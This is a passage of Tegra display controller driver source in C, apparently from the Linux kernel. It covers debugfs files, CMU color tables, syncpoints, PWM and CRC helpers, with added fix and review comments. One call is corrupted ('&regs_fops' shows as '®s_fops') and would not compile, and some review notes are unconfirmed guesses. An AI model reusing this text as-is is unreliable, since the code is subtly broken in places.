static int dbg_dc_mode_open(struct inode *inode, struct file *file)
{
	return single_open(file, dbg_dc_mode_show, inode->i_private);
}
/* File operations for the read-only debugfs "mode" file. */
static const struct file_operations mode_fops = {
	.open		= dbg_dc_mode_open,
	.read		= seq_read,
	.llseek		= seq_lseek,
	.release	= single_release,
};
/* debugfs "stats" show handler: print the per-window underflow counters
 * (snapshot taken under dc->lock). */
static int dbg_dc_stats_show(struct seq_file *s, void *unused)
{
	struct tegra_dc *dc = s->private;

	mutex_lock(&dc->lock);
	seq_printf(s,
		"underflows: %llu\n"
		"underflows_a: %llu\n"
		"underflows_b: %llu\n"
		"underflows_c: %llu\n",
		dc->stats.underflows,
		dc->stats.underflows_a,
		dc->stats.underflows_b,
		dc->stats.underflows_c);
	mutex_unlock(&dc->lock);

	return 0;
}
/* debugfs "stats" open: bind the per-dc private data to the seq_file. */
static int dbg_dc_stats_open(struct inode *inode, struct file *file)
{
	return single_open(file, dbg_dc_stats_show, inode->i_private);
}
/* File operations for the read-only debugfs "stats" file. */
static const struct file_operations stats_fops = {
	.open		= dbg_dc_stats_open,
	.read		= seq_read,
	.llseek		= seq_lseek,
	.release	= single_release,
};
/* Tear down this controller's debugfs directory.  Safe to call when the
 * directory was never created. */
static void tegra_dc_remove_debugfs(struct tegra_dc *dc)
{
	/* debugfs_remove_recursive() ignores NULL, so no check is needed. */
	debugfs_remove_recursive(dc->debugdir);
	dc->debugdir = NULL;
}
static void tegra_dc_create_debugfs(struct tegra_dc *dc)
{
struct dentry *retval;
dc->debugdir = debugfs_create_dir(dev_name(&dc->ndev->dev), NULL);
if (!dc->debugdir)
goto remove_out;
retval = debugfs_create_file("regs", S_IRUGO, dc->debugdir, dc,
®s_fops);
if (!retval)
goto remove_out;
retval = debugfs_create_file("mode", S_IRUGO, dc->debugdir, dc,
&mode_fops);
if (!retval)
goto remove_out;
retval = debugfs_create_file("stats", S_IRUGO, dc->debugdir, dc,
&stats_fops);
if (!retval)
goto remove_out;
return;
remove_out:
dev_err(&dc->ndev->dev, "could not create debugfs\n");
tegra_dc_remove_debugfs(dc);
}
#else /* !CONFIG_DEBUG_FS */
/* No-op stubs when debugfs support is compiled out.  (Fixed: stray ';'
 * after the bodies, and guard comments that named a nonexistent
 * CONFIG_DEBUGFS symbol — the #ifdef above tests CONFIG_DEBUG_FS.) */
static inline void tegra_dc_create_debugfs(struct tegra_dc *dc) { }
static inline void __devexit tegra_dc_remove_debugfs(struct tegra_dc *dc) { }
#endif /* CONFIG_DEBUG_FS */
/* Register 'dc' in the global head table slot 'index' (pass dc == NULL to
 * clear a slot).  Returns 0 on success, -EINVAL for an out-of-range index,
 * -EBUSY if the slot is already claimed. */
static int tegra_dc_set(struct tegra_dc *dc, int index)
{
	int ret = 0;

	mutex_lock(&tegra_dc_lock);
	/* Fix: also reject negative indices — 'index' is signed, and a
	 * negative value previously indexed tegra_dcs[] out of bounds. */
	if (index < 0 || index >= TEGRA_MAX_DC) {
		ret = -EINVAL;
		goto out;
	}
	if (dc != NULL && tegra_dcs[index] != NULL) {
		ret = -EBUSY;
		goto out;
	}

	tegra_dcs[index] = dc;

out:
	mutex_unlock(&tegra_dc_lock);

	return ret;
}
/* Report whether more than one display controller is currently enabled. */
unsigned int tegra_dc_has_multiple_dc(void)
{
	unsigned int idx;
	unsigned int cnt = 0;
	struct tegra_dc *dc;

	mutex_lock(&tegra_dc_lock);
	for (idx = 0; idx < TEGRA_MAX_DC; idx++) {
		dc = tegra_dcs[idx];
		if (dc != NULL && dc->enabled)
			cnt++;
	}
	mutex_unlock(&tegra_dc_lock);

	return (cnt > 1);
}
/* get the stride size of a window.
 * return: stride size in bytes for window win. or 0 if unavailble. */
int tegra_dc_get_stride(struct tegra_dc *dc, unsigned win)
{
	u32 stride;

	if (!dc->enabled)
		return 0;
	/* Fix: valid window indices are 0 .. DC_N_WINDOWS - 1; the old
	 * check used '>' and let win == DC_N_WINDOWS through. */
	BUG_ON(win >= DC_N_WINDOWS);
	mutex_lock(&dc->lock);
	tegra_dc_io_start(dc);
	tegra_dc_hold_dc_out(dc);
	tegra_dc_writel(dc, WINDOW_A_SELECT << win,
		DC_CMD_DISPLAY_WINDOW_HEADER);
	stride = tegra_dc_readl(dc, DC_WIN_LINE_STRIDE);
	tegra_dc_release_dc_out(dc);
	tegra_dc_io_end(dc);
	mutex_unlock(&dc->lock);
	return GET_LINE_STRIDE(stride);
}
EXPORT_SYMBOL(tegra_dc_get_stride);
/* Look up a registered display controller by head index; NULL when the
 * index is out of range (or the head was never probed). */
struct tegra_dc *tegra_dc_get_dc(unsigned idx)
{
	return (idx < TEGRA_MAX_DC) ? tegra_dcs[idx] : NULL;
}
EXPORT_SYMBOL(tegra_dc_get_dc);
/* Return the window descriptor for index 'win', or NULL when the index is
 * beyond this controller's window count. */
struct tegra_dc_win *tegra_dc_get_window(struct tegra_dc *dc, unsigned win)
{
	return (win < dc->n_windows) ? &dc->windows[win] : NULL;
}
EXPORT_SYMBOL(tegra_dc_get_window);
/* Report whether a display is currently connected to this controller. */
bool tegra_dc_get_connected(struct tegra_dc *dc)
{
	return dc->connected;
}
EXPORT_SYMBOL(tegra_dc_get_connected);
/* Evaluate hot-plug detect for this output.  A forced hotplug_state (1 =
 * force on, -1 = force off) overrides the GPIO; otherwise the GPIO level
 * is interpreted per the output's HOTPLUG polarity flags.  The result is
 * also reported to the output's hotplug_report callback, if present. */
bool tegra_dc_hpd(struct tegra_dc *dc)
{
	int sense;
	int level;
	int hpd;

	if (WARN_ON(!dc || !dc->out))
		return false;

	switch (dc->out->hotplug_state) {
	case 1:		/* force on */
		return true;
	case -1:	/* force off */
		return false;
	default:	/* 0 (and anything else): read the GPIO */
		break;
	}

	level = gpio_get_value_cansleep(dc->out->hotplug_gpio);
	sense = dc->out->flags & TEGRA_DC_OUT_HOTPLUG_MASK;
	hpd = (sense == TEGRA_DC_OUT_HOTPLUG_HIGH && level) ||
	      (sense == TEGRA_DC_OUT_HOTPLUG_LOW && !level);

	if (dc->out->hotplug_report)
		dc->out->hotplug_report(hpd);

	return hpd;
}
EXPORT_SYMBOL(tegra_dc_hpd);
/* Program a linear ramp into the 16 phase entries of the horizontal and
 * vertical scaling-filter tables of the currently selected window
 * (v0 descends 128..8, v1 ascends 0..120 across the phases). */
static void tegra_dc_set_scaling_filter(struct tegra_dc *dc)
{
	unsigned i;
	unsigned v0 = 128;
	unsigned v1 = 0;

	/* linear horizontal and vertical filters */
	for (i = 0; i < 16; i++) {
		tegra_dc_writel(dc, (v1 << 16) | (v0 << 8),
			DC_WIN_H_FILTER_P(i));
		tegra_dc_writel(dc, v0,
			DC_WIN_V_FILTER_P(i));
		v0 -= 8;
		v1 += 8;
	}
}
#ifdef CONFIG_TEGRA_DC_CMU
static void tegra_dc_cache_cmu(struct tegra_dc_cmu *dst_cmu,
struct tegra_dc_cmu *src_cmu)
{
memcpy(dst_cmu, src_cmu, sizeof(struct tegra_dc_cmu));
}
/* Load a CMU (color management unit) table into hardware: 256-entry
 * LUT1, the 3x3 CSC matrix, then the 960-entry LUT2.  The caller is
 * responsible for any CMU disable/re-enable sequencing around this. */
static void tegra_dc_set_cmu(struct tegra_dc *dc, struct tegra_dc_cmu *cmu)
{
	u32 val;
	u32 i;

	for (i = 0; i < 256; i++) {
		val = LUT1_ADDR(i) | LUT1_DATA(cmu->lut1[i]);
		tegra_dc_writel(dc, val, DC_COM_CMU_LUT1);
	}

	tegra_dc_writel(dc, cmu->csc.krr, DC_COM_CMU_CSC_KRR);
	tegra_dc_writel(dc, cmu->csc.kgr, DC_COM_CMU_CSC_KGR);
	tegra_dc_writel(dc, cmu->csc.kbr, DC_COM_CMU_CSC_KBR);
	tegra_dc_writel(dc, cmu->csc.krg, DC_COM_CMU_CSC_KRG);
	tegra_dc_writel(dc, cmu->csc.kgg, DC_COM_CMU_CSC_KGG);
	tegra_dc_writel(dc, cmu->csc.kbg, DC_COM_CMU_CSC_KBG);
	tegra_dc_writel(dc, cmu->csc.krb, DC_COM_CMU_CSC_KRB);
	tegra_dc_writel(dc, cmu->csc.kgb, DC_COM_CMU_CSC_KGB);
	tegra_dc_writel(dc, cmu->csc.kbb, DC_COM_CMU_CSC_KBB);

	for (i = 0; i < 960; i++) {
		/* NOTE(review): lut2 entries are packed with LUT1_DATA();
		 * if a distinct LUT2_DATA() macro exists with a different
		 * field layout this may be a copy/paste slip — confirm
		 * against the register definitions. */
		val = LUT2_ADDR(i) | LUT1_DATA(cmu->lut2[i]);
		tegra_dc_writel(dc, val, DC_COM_CMU_LUT2);
	}
}
void tegra_dc_get_cmu(struct tegra_dc *dc, struct tegra_dc_cmu *cmu)
{
u32 val;
u32 i;
bool flags;
val = tegra_dc_readl(dc, DC_DISP_DISP_COLOR_CONTROL);
if (val & CMU_ENABLE)
flags = true;
val &= ~CMU_ENABLE;
tegra_dc_writel(dc, val, DC_DISP_DISP_COLOR_CONTROL);
tegra_dc_writel(dc, GENERAL_UPDATE, DC_CMD_STATE_CONTROL);
tegra_dc_writel(dc, GENERAL_ACT_REQ, DC_CMD_STATE_CONTROL);
/*TODO: Sync up with frame end */
mdelay(20);
for (i = 0; i < 256; i++) {
val = LUT1_READ_EN | LUT1_READ_ADDR(i);
tegra_dc_writel(dc, val, DC_COM_CMU_LUT1_READ);
val = tegra_dc_readl(dc, DC_COM_CMU_LUT1);
cmu->lut1[i] = LUT1_READ_DATA(val);
}
cmu->csc.krr = tegra_dc_readl(dc, DC_COM_CMU_CSC_KRR);
cmu->csc.kgr = tegra_dc_readl(dc, DC_COM_CMU_CSC_KGR);
cmu->csc.kbr = tegra_dc_readl(dc, DC_COM_CMU_CSC_KBR);
cmu->csc.krg = tegra_dc_readl(dc, DC_COM_CMU_CSC_KRG);
cmu->csc.kgg = tegra_dc_readl(dc, DC_COM_CMU_CSC_KGG);
cmu->csc.kbg = tegra_dc_readl(dc, DC_COM_CMU_CSC_KBG);
cmu->csc.krb = tegra_dc_readl(dc, DC_COM_CMU_CSC_KRB);
cmu->csc.kgb = tegra_dc_readl(dc, DC_COM_CMU_CSC_KGB);
cmu->csc.kbb = tegra_dc_readl(dc, DC_COM_CMU_CSC_KBB);
for (i = 0; i < 960; i++) {
val = LUT2_READ_EN | LUT2_READ_ADDR(i);
tegra_dc_writel(dc, val, DC_COM_CMU_LUT2_READ);
val = tegra_dc_readl(dc, DC_COM_CMU_LUT2);
cmu->lut2[i] = LUT2_READ_DATA(val);
}
}
EXPORT_SYMBOL(tegra_dc_get_cmu);
/* Apply CMU table *cmu to @dc if the platform data enables CMU,
 * otherwise just clear the enable flag and return.  A table other than
 * the cached dc->cmu is first cached, then loaded with CMU output
 * temporarily disabled so the LUT writes take effect cleanly.
 * Always returns 0. */
int _tegra_dc_update_cmu(struct tegra_dc *dc, struct tegra_dc_cmu *cmu)
{
	u32 val;

	if (dc->pdata->cmu_enable) {
		dc->pdata->flags |= TEGRA_DC_FLAG_CMU_ENABLE;
	} else {
		dc->pdata->flags &= ~TEGRA_DC_FLAG_CMU_ENABLE;
		return 0;
	}

	if (cmu != &dc->cmu) {
		tegra_dc_cache_cmu(&dc->cmu, cmu);

		/* Disable CMU */
		val = tegra_dc_readl(dc, DC_DISP_DISP_COLOR_CONTROL);
		if (val & CMU_ENABLE) {
			val &= ~CMU_ENABLE;
			tegra_dc_writel(dc, val, DC_DISP_DISP_COLOR_CONTROL);
			val = GENERAL_UPDATE;
			tegra_dc_writel(dc, val, DC_CMD_STATE_CONTROL);
			val = GENERAL_ACT_REQ;
			tegra_dc_writel(dc, val, DC_CMD_STATE_CONTROL);
			/*TODO: Sync up with vsync */
			mdelay(20);
		}

		tegra_dc_set_cmu(dc, &dc->cmu);
	}

	return 0;
}
/* Locked wrapper around _tegra_dc_update_cmu(): takes dc->lock and the
 * io/out references, reprograms the CMU and the color-control register.
 * Returns 0 immediately when the DC is disabled. */
int tegra_dc_update_cmu(struct tegra_dc *dc, struct tegra_dc_cmu *cmu)
{
	int err = 0;

	mutex_lock(&dc->lock);
	if (dc->enabled) {
		tegra_dc_io_start(dc);
		tegra_dc_hold_dc_out(dc);

		err = _tegra_dc_update_cmu(dc, cmu);
		tegra_dc_set_color_control(dc);

		tegra_dc_release_dc_out(dc);
		tegra_dc_io_end(dc);
	}
	mutex_unlock(&dc->lock);

	return err;
}
EXPORT_SYMBOL(tegra_dc_update_cmu);
/* Record the requested CMU enable state in platform data and reprogram
 * the hardware, using the board-supplied table when present and the
 * built-in default otherwise. */
void tegra_dc_cmu_enable(struct tegra_dc *dc, bool cmu_enable)
{
	struct tegra_dc_cmu *table;

	dc->pdata->cmu_enable = cmu_enable;
	table = dc->pdata->cmu ? dc->pdata->cmu : &default_cmu;
	tegra_dc_update_cmu(dc, table);
}
#else
/* CMU support compiled out: stub the helpers to empty no-ops. */
#define tegra_dc_cache_cmu(dst_cmu, src_cmu)
#define tegra_dc_set_cmu(dc, cmu)
#define tegra_dc_update_cmu(dc, cmu)
#endif
/* Synchronously disable the DC's interrupt line.
 * disable_irq() blocks until handler completes, calling this function while
 * holding dc->lock can deadlock. */
static inline void disable_dc_irq(const struct tegra_dc *dc)
{
	disable_irq(dc->irq);
}
/* Return the host1x syncpoint id backing window @i of @dc.
 * NOTE(review): @i is not range-checked here — callers must pass a
 * valid window index. */
u32 tegra_dc_get_syncpt_id(const struct tegra_dc *dc, int i)
{
	return dc->syncpt[i].id;
}
EXPORT_SYMBOL(tegra_dc_get_syncpt_id);
/* Reserve the next fence value on window @i's syncpoint and cache it as
 * the new max.  The third argument to nvhost_syncpt_incr_max_ext() is
 * the increment: 1 when the DC is enabled, 0 (no advance) otherwise.
 * Returns the (possibly unchanged) max value. */
u32 tegra_dc_incr_syncpt_max(struct tegra_dc *dc, int i)
{
	u32 max;

	mutex_lock(&dc->lock);
	tegra_dc_io_start(dc);
	tegra_dc_hold_dc_out(dc);
	max = nvhost_syncpt_incr_max_ext(dc->ndev,
		dc->syncpt[i].id, ((dc->enabled) ? 1 : 0));
	dc->syncpt[i].max = max;
	tegra_dc_release_dc_out(dc);
	tegra_dc_io_end(dc);
	mutex_unlock(&dc->lock);

	return max;
}
/* CPU-increment window @i's syncpoint until the cached min reaches
 * @val, releasing any waiters up to that fence.  Skipped entirely when
 * the DC is disabled. */
void tegra_dc_incr_syncpt_min(struct tegra_dc *dc, int i, u32 val)
{
	mutex_lock(&dc->lock);
	if (dc->enabled) {
		tegra_dc_io_start(dc);
		tegra_dc_hold_dc_out(dc);
		while (dc->syncpt[i].min < val) {
			dc->syncpt[i].min++;
			nvhost_syncpt_cpu_incr_ext(dc->ndev, dc->syncpt[i].id);
		}
		tegra_dc_release_dc_out(dc);
		tegra_dc_io_end(dc);
	}
	mutex_unlock(&dc->lock);
}
/* Configure one of the DC's PWM generators (PM0 or PM1) with the
 * period, clock divider, clock source and duty cycle from @cfg, and
 * route the matching LM pin to it.  No-op when the DC is disabled. */
void
tegra_dc_config_pwm(struct tegra_dc *dc, struct tegra_dc_pwm_params *cfg)
{
	unsigned int ctrl;
	unsigned long out_sel;
	unsigned long cmd_state;

	mutex_lock(&dc->lock);
	if (!dc->enabled) {
		mutex_unlock(&dc->lock);
		return;
	}

	tegra_dc_io_start(dc);
	tegra_dc_hold_dc_out(dc);

	ctrl = ((cfg->period << PM_PERIOD_SHIFT) |
		(cfg->clk_div << PM_CLK_DIVIDER_SHIFT) |
		cfg->clk_select);

	/* The new value should be effected immediately */
	/* NOTE(review): bit 2 of DC_CMD_STATE_ACCESS presumably selects
	 * direct/active register access so the write takes effect without
	 * an ACT_REQ — confirm against the TRM. */
	cmd_state = tegra_dc_readl(dc, DC_CMD_STATE_ACCESS);
	tegra_dc_writel(dc, (cmd_state | (1 << 2)), DC_CMD_STATE_ACCESS);

	switch (cfg->which_pwm) {
	case TEGRA_PWM_PM0:
		/* Select the LM0 on PM0 */
		out_sel = tegra_dc_readl(dc, DC_COM_PIN_OUTPUT_SELECT5);
		out_sel &= ~(7 << 0);
		out_sel |= (3 << 0);
		tegra_dc_writel(dc, out_sel, DC_COM_PIN_OUTPUT_SELECT5);
		tegra_dc_writel(dc, ctrl, DC_COM_PM0_CONTROL);
		tegra_dc_writel(dc, cfg->duty_cycle, DC_COM_PM0_DUTY_CYCLE);
		break;
	case TEGRA_PWM_PM1:
		/* Select the LM1 on PM1 */
		out_sel = tegra_dc_readl(dc, DC_COM_PIN_OUTPUT_SELECT5);
		out_sel &= ~(7 << 4);
		out_sel |= (3 << 4);
		tegra_dc_writel(dc, out_sel, DC_COM_PIN_OUTPUT_SELECT5);
		tegra_dc_writel(dc, ctrl, DC_COM_PM1_CONTROL);
		tegra_dc_writel(dc, cfg->duty_cycle, DC_COM_PM1_DUTY_CYCLE);
		break;
	default:
		dev_err(&dc->ndev->dev, "Error: Need which_pwm\n");
		break;
	}
	/* restore the previous register-access mode */
	tegra_dc_writel(dc, cmd_state, DC_CMD_STATE_ACCESS);
	tegra_dc_release_dc_out(dc);
	tegra_dc_io_end(dc);
	mutex_unlock(&dc->lock);
}
EXPORT_SYMBOL(tegra_dc_config_pwm);
/* Program output-pin polarity registers 1 and 3 from the per-board pin
 * list: each entry picks active-low or active-high for data-enable,
 * H-sync, V-sync or pixel-clock.  Starting from the SoC init values,
 * set/clear masks accumulated over @pins are applied and written back. */
void tegra_dc_set_out_pin_polars(struct tegra_dc *dc,
				const struct tegra_dc_out_pin *pins,
				const unsigned int n_pins)
{
	unsigned int i;
	int name;
	int pol;
	u32 pol1, pol3;
	u32 set1, unset1;
	u32 set3, unset3;

	set1 = set3 = unset1 = unset3 = 0;

	for (i = 0; i < n_pins; i++) {
		name = (pins + i)->name;
		pol = (pins + i)->pol;

		/* set polarity by name */
		switch (name) {
		case TEGRA_DC_OUT_PIN_DATA_ENABLE:
			if (pol == TEGRA_DC_OUT_PIN_POL_LOW)
				set3 |= LSPI_OUTPUT_POLARITY_LOW;
			else
				unset3 |= LSPI_OUTPUT_POLARITY_LOW;
			break;
		case TEGRA_DC_OUT_PIN_H_SYNC:
			if (pol == TEGRA_DC_OUT_PIN_POL_LOW)
				set1 |= LHS_OUTPUT_POLARITY_LOW;
			else
				unset1 |= LHS_OUTPUT_POLARITY_LOW;
			break;
		case TEGRA_DC_OUT_PIN_V_SYNC:
			if (pol == TEGRA_DC_OUT_PIN_POL_LOW)
				set1 |= LVS_OUTPUT_POLARITY_LOW;
			else
				unset1 |= LVS_OUTPUT_POLARITY_LOW;
			break;
		case TEGRA_DC_OUT_PIN_PIXEL_CLOCK:
			if (pol == TEGRA_DC_OUT_PIN_POL_LOW)
				set1 |= LSC0_OUTPUT_POLARITY_LOW;
			else
				unset1 |= LSC0_OUTPUT_POLARITY_LOW;
			break;
		default:
			/* pr_err/__func__ replace the level-less printk()
			 * and the deprecated __FUNCTION__ extension */
			pr_err("Invalid argument in function %s\n",
				__func__);
			break;
		}
	}

	pol1 = DC_COM_PIN_OUTPUT_POLARITY1_INIT_VAL;
	pol3 = DC_COM_PIN_OUTPUT_POLARITY3_INIT_VAL;

	pol1 |= set1;
	pol1 &= ~unset1;

	pol3 |= set3;
	pol3 &= ~unset3;

	tegra_dc_writel(dc, pol1, DC_COM_PIN_OUTPUT_POLARITY1);
	tegra_dc_writel(dc, pol3, DC_COM_PIN_OUTPUT_POLARITY3);
}
static struct tegra_dc_mode *tegra_dc_get_override_mode(struct tegra_dc *dc)
{
if (dc->out->type == TEGRA_DC_OUT_RGB ||
dc->out->type == TEGRA_DC_OUT_HDMI ||
dc->out->type == TEGRA_DC_OUT_DSI)
return override_disp_mode[dc->out->type].pclk ?
&override_disp_mode[dc->out->type] : NULL;
else
return NULL;
}
/* Bind output descriptor @out to @dc: program the boot-loader override
 * mode if one exists, else the first listed mode; then select the
 * out_ops vtable for the output type and run its init hook if any.
 * Unknown types leave out_ops NULL. */
static void tegra_dc_set_out(struct tegra_dc *dc, struct tegra_dc_out *out)
{
	struct tegra_dc_mode *mode;

	dc->out = out;
	mode = tegra_dc_get_override_mode(dc);

	if (mode)
		tegra_dc_set_mode(dc, mode);
	else if (out->n_modes > 0)
		tegra_dc_set_mode(dc, &dc->out->modes[0]);

	switch (out->type) {
	case TEGRA_DC_OUT_RGB:
		dc->out_ops = &tegra_dc_rgb_ops;
		break;

	case TEGRA_DC_OUT_HDMI:
		dc->out_ops = &tegra_dc_hdmi_ops;
		break;

	case TEGRA_DC_OUT_DSI:
		dc->out_ops = &tegra_dc_dsi_ops;
		break;

	default:
		/* unrecognized output type: no ops vtable */
		dc->out_ops = NULL;
		break;
	}

	if (dc->out_ops && dc->out_ops->init)
		dc->out_ops->init(dc);
}
/* returns on error: -EINVAL
 * on success: TEGRA_DC_OUT_RGB, TEGRA_DC_OUT_HDMI, or TEGRA_DC_OUT_DSI. */
int tegra_dc_get_out(const struct tegra_dc *dc)
{
	if (!dc || !dc->out)
		return -EINVAL;
	return dc->out->type;
}
/* Physical height of the attached output in its native units, or 0
 * when no output is bound. */
unsigned tegra_dc_get_out_height(const struct tegra_dc *dc)
{
	return dc->out ? dc->out->height : 0;
}
EXPORT_SYMBOL(tegra_dc_get_out_height);
/* Physical width of the attached output in its native units, or 0
 * when no output is bound. */
unsigned tegra_dc_get_out_width(const struct tegra_dc *dc)
{
	return dc->out ? dc->out->width : 0;
}
EXPORT_SYMBOL(tegra_dc_get_out_width);
/* Maximum pixel clock the attached output supports; 0 when no output
 * is bound or no limit was specified. */
unsigned tegra_dc_get_out_max_pixclock(const struct tegra_dc *dc)
{
	return dc->out ? dc->out->max_pixclock : 0;
}
EXPORT_SYMBOL(tegra_dc_get_out_max_pixclock);
/* Turn on CRC generation over active pixel data and latch the setting
 * with a GENERAL_UPDATE / GENERAL_ACT_REQ pair. */
void tegra_dc_enable_crc(struct tegra_dc *dc)
{
	u32 val;

	mutex_lock(&dc->lock);
	tegra_dc_io_start(dc);
	tegra_dc_hold_dc_out(dc);

	val = CRC_ALWAYS_ENABLE | CRC_INPUT_DATA_ACTIVE_DATA |
		CRC_ENABLE_ENABLE;
	tegra_dc_writel(dc, val, DC_COM_CRC_CONTROL);
	tegra_dc_writel(dc, GENERAL_UPDATE, DC_CMD_STATE_CONTROL);
	tegra_dc_writel(dc, GENERAL_ACT_REQ, DC_CMD_STATE_CONTROL);

	tegra_dc_release_dc_out(dc);
	tegra_dc_io_end(dc);
	mutex_unlock(&dc->lock);
}
/* Turn CRC generation back off and latch the change. */
void tegra_dc_disable_crc(struct tegra_dc *dc)
{
	mutex_lock(&dc->lock);
	tegra_dc_io_start(dc);
	tegra_dc_hold_dc_out(dc);

	tegra_dc_writel(dc, 0x0, DC_COM_CRC_CONTROL);
	tegra_dc_writel(dc, GENERAL_UPDATE, DC_CMD_STATE_CONTROL);
	tegra_dc_writel(dc, GENERAL_ACT_REQ, DC_CMD_STATE_CONTROL);

	tegra_dc_release_dc_out(dc);
	tegra_dc_io_end(dc);
	mutex_unlock(&dc->lock);
}
/* Read the most recently latched frame CRC.  Returns 0 when @dc is
 * NULL.  Off the simulation platform, waits TEGRA_CRC_LATCHED_DELAY
 * first because the latched value only becomes valid after VBLANK. */
u32 tegra_dc_read_checksum_latched(struct tegra_dc *dc)
{
	u32 crc = 0;	/* was 'int': match the u32 return/register width */

	if (!dc) {
		pr_err("Failed to get dc: NULL parameter.\n");
		goto crc_error;
	}
#ifndef CONFIG_TEGRA_SIMULATION_PLATFORM
	/* TODO: Replace mdelay with code to sync VBlANK, since
	 * DC_COM_CRC_CHECKSUM_LATCHED is available after VBLANK */
	mdelay(TEGRA_CRC_LATCHED_DELAY);
#endif

	mutex_lock(&dc->lock);
	tegra_dc_io_start(dc);
	tegra_dc_hold_dc_out(dc);
	crc = tegra_dc_readl(dc, DC_COM_CRC_CHECKSUM_LATCHED);
	tegra_dc_release_dc_out(dc);
	tegra_dc_io_end(dc);
	mutex_unlock(&dc->lock);
crc_error:
	return crc;
}
/* True when any window still has an un-latched ACT_REQ pending, i.e. a
 * programmed update the hardware has not yet taken.  Always false on
 * the simulation platform (no real registers to poll). */
static bool tegra_dc_windows_are_dirty(struct tegra_dc *dc)
{
#ifndef CONFIG_TEGRA_SIMULATION_PLATFORM
	u32 val;

	val = tegra_dc_readl(dc, DC_CMD_STATE_CONTROL);
	if (val & (WIN_A_ACT_REQ | WIN_B_ACT_REQ | WIN_C_ACT_REQ))
		return true;
#endif
	return false;
}
/* Counterpart of disable_dc_irq().  FPGA platforms never service DC
 * interrupts, so there the line is forced off instead. */
static inline void enable_dc_irq(const struct tegra_dc *dc)
{
#ifndef CONFIG_TEGRA_FPGA_PLATFORM
	enable_irq(dc->irq);
#else
	/* Always disable DC interrupts on FPGA. */
	disable_irq(dc->irq);
#endif
}
/* Fill in fb_vblank capability flags: one-shot panels support vsync
 * reporting; other outputs leave *vblank untouched. */
void tegra_dc_get_fbvblank(struct tegra_dc *dc, struct fb_vblank *vblank)
{
	if (dc->out->flags & TEGRA_DC_OUT_ONE_SHOT_MODE)
		vblank->flags = FB_VBLANK_HAVE_VSYNC;
}
/* Block until the next vblank on a one-shot-mode panel.
 * Returns -ENOTTY for non-one-shot outputs or when the DC is disabled;
 * otherwise the wait_for_completion_interruptible() result (0 on
 * wakeup, -ERESTARTSYS if interrupted). */
int tegra_dc_wait_for_vsync(struct tegra_dc *dc)
{
	int ret = -ENOTTY;

	if (!(dc->out->flags & TEGRA_DC_OUT_ONE_SHOT_MODE) || !dc->enabled)
		return ret;

	/*
	 * Logic is as follows
	 * a) Indicate we need a vblank.
	 * b) Wait for completion to be signalled from isr.
	 * c) Initialize completion for next iteration.
	 */

	tegra_dc_hold_dc_out(dc);
	dc->out->user_needs_vblank = true;

	ret = wait_for_completion_interruptible(&dc->out->user_vblank_comp);
	/* re-arm for the next caller (isr signals user_vblank_comp) */
	init_completion(&dc->out->user_vblank_comp);
	tegra_dc_release_dc_out(dc);

	return ret;
}
/* Push the smart-dimmer brightness to the backlight device, resolving
 * the device by name on first use.  Must be called without dc->lock
 * held (backlight_update_status() may block). */
static void tegra_dc_prism_update_backlight(struct tegra_dc *dc)
{
	/* Do the actual brightness update outside of the mutex dc->lock */
	if (dc->out->sd_settings && !dc->out->sd_settings->bl_device &&
		dc->out->sd_settings->bl_device_name) {
		char *bl_device_name =
			dc->out->sd_settings->bl_device_name;
		dc->out->sd_settings->bl_device =
			get_backlight_device_by_name(bl_device_name);
	}

	if (dc->out->sd_settings && dc->out->sd_settings->bl_device) {
		struct backlight_device *bl = dc->out->sd_settings->bl_device;
		backlight_update_status(bl);
	}
}
/* Bottom-half vblank worker: reprograms bandwidth for continuous-mode
 * outputs, maintains the vblank-interrupt ref-count bits, and runs the
 * smart-dimmer brightness update.  The backlight write happens after
 * dc->lock is dropped because it may block. */
static void tegra_dc_vblank(struct work_struct *work)
{
	struct tegra_dc *dc = container_of(work, struct tegra_dc, vblank_work);
	bool nvsd_updated = false;

	mutex_lock(&dc->lock);
	if (!dc->enabled) {
		mutex_unlock(&dc->lock);
		return;
	}

	tegra_dc_io_start(dc);
	tegra_dc_hold_dc_out(dc);

	/* use the new frame's bandwidth setting instead of max(current, new),
	 * skip this if we're using tegra_dc_one_shot_worker() */
	if (!(dc->out->flags & TEGRA_DC_OUT_ONE_SHOT_MODE))
		tegra_dc_program_bandwidth(dc, true);

	/* Clear the V_BLANK_FLIP bit of vblank ref-count if update is clean. */
	if (!tegra_dc_windows_are_dirty(dc))
		clear_bit(V_BLANK_FLIP, &dc->vblank_ref_count);

	/* Update the SD brightness */
	if (dc->out->sd_settings && !dc->out->sd_settings->use_vpulse2) {
		nvsd_updated = nvsd_update_brightness(dc);
		/* Ref-count vblank if nvsd is on-going. Otherwise, clean the
		 * V_BLANK_NVSD bit of vblank ref-count. */
		if (nvsd_updated) {
			set_bit(V_BLANK_NVSD, &dc->vblank_ref_count);
			tegra_dc_unmask_interrupt(dc, V_BLANK_INT);
		} else {
			clear_bit(V_BLANK_NVSD, &dc->vblank_ref_count);
		}
	}

	/* Mask vblank interrupt if ref-count is zero. */
	if (!dc->vblank_ref_count)
		tegra_dc_mask_interrupt(dc, V_BLANK_INT);

	tegra_dc_release_dc_out(dc);
	tegra_dc_io_end(dc);
	mutex_unlock(&dc->lock);

	/* Do the actual brightness update outside of the mutex dc->lock */
	if (nvsd_updated)
		tegra_dc_prism_update_backlight(dc);
}
/* One-shot-mode idle worker: once the memory client has gone idle,
 * drop the reserved bandwidth and give the output driver a chance to
 * enter its idle state. */
static void tegra_dc_one_shot_worker(struct work_struct *work)
{
	struct tegra_dc *dc = container_of(
		to_delayed_work(work), struct tegra_dc, one_shot_work);

	mutex_lock(&dc->lock);
	/* memory client has gone idle */
	tegra_dc_clear_bandwidth(dc);

	/* out_ops is NULL for unrecognized output types (see
	 * tegra_dc_set_out()); check it like every other call site does. */
	if (dc->out_ops && dc->out_ops->idle) {
		tegra_dc_io_start(dc);
		dc->out_ops->idle(dc);
		tegra_dc_io_end(dc);
	}
	mutex_unlock(&dc->lock);
}
/* return an arbitrarily large number if count overflow occurs.
 * make it a nice base-10 number to show up in stats output */
static u64 tegra_dc_underflow_count(struct tegra_dc *dc, unsigned reg)
{
	unsigned raw = tegra_dc_readl(dc, reg);

	tegra_dc_writel(dc, 0, reg);	/* reset the hardware counter */
	if (raw & 0x80000000)
		return 10000000000ll;
	return raw;
}
/* Deferred underflow handler: accumulate per-window underflow stats,
 * trigger recovery after repeated (>4) underflows on a window
 * (full DC reset on Tegra2, a line-flush pulse on Tegra3), then clear
 * and re-arm the underflow interrupts. */
static void tegra_dc_underflow_handler(struct tegra_dc *dc)
{
	int i;

	dc->stats.underflows++;
